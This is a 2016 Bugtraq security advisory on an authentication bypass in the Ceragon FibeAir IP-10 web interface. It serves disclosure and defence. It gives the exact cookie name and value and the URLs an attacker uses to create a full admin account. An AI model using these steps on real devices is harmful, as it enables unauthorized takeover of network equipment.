
Date: Wed, 15 Jun 2016 18:43:01 GMT
From: iancling@...il.com
To: bugtraq@...urityfocus.com
Subject: Authentication bypass in Ceragon FibeAir IP-10 web interface (<7.2.0)

[+] Credits: Ian Ling
[+] Website: iancaling.com

Vendor:
=================
www.ceragon.com

Product:
======================
-FibeAir IP-10

Vulnerability Type:
===================
Default Root Account

CVE Reference:
==============
N/A

Vulnerability Details:
=====================
Ceragon FibeAir IP-10 devices do not properly ensure that a user has authenticated before granting them access to the web interface of the device. The attacker simply needs to add a cookie to their session named "ALBATROSS" with the value "0-4-11". They can then browse to one of the following URL's (varies by model number and software version) to add their own user account with full admin privileges:

/responder.fcgi1?winid=106&winname=Users%20%26%20Groups&slot=1&mainslot=1
/responder.fcgi1?winid=109&winname=Users%20%26%20Groups&slot=1&mainslot=1
/responder.fcgi1?winid=103&winname=Users%20%26%20Groups&slot=1&mainslot=1
/responder.fcgi0?winid=89&winname=Users%20%26%20Groups&slot=0

After adding their own user account, they can clear their cookies and log in with the new credentials they created.

Affected versions:
All versions below 7.2.0

Impact:
The remote attacker has full control over the device's web interface.


Disclosure Timeline:
===================================
Vendor Notification: May 5, 2016
Public Disclosure: June 15, 2016

Exploitation Technique:
=======================
Remote

Severity Level:
================
Critical
